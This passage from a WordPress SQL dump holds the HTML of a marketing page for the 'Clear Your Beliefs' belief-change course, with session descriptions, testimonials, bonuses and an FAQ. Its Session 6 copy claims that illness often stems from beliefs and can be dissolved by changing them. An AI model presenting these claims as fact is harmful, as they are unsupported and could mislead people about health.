will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="168" height="193" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\nYou''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<div class="icon_box">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions with Lion Goodman</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies – from the comfort of your own home. Each class session helps you learn the specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes and two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus... the <em>Clear Your Beliefs BONUS Collection</em></h1>\r\n<ul>\r\n	<li><em>What Makes Love So Confusing?</em> – Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>The Spiritual Technology of Manifesting with Beliefs</em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <em>The LoveStyle Profile Quiz</em></li>\r\n	<li><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 19:59:50', '2014-06-18 00:59:50', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
